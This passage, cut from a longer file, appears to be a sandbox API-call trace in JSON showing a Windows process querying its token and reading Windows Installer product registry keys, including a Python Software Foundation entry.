23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Data", "value": "Python Software Foundation" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "354CFBD9D3C92FE4DA44706066629B35" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" } ], "repeated": 0, "id": 54 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\x00\\x003\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 64 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 66 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 73 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 74 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 76 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "6F44AD6D2BD8E734883088D7D16A3610" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 83 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 84 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\x00\\x003\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-02-27 23:34:21,519", 